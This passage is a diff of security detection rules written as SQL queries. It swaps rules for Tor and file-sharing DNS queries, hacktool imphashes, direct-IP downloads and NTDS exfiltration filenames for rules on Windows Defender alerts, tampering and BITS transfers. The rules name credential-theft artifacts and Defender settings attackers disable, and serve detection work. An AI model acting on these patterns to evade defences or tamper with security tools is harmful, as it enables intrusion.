ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE 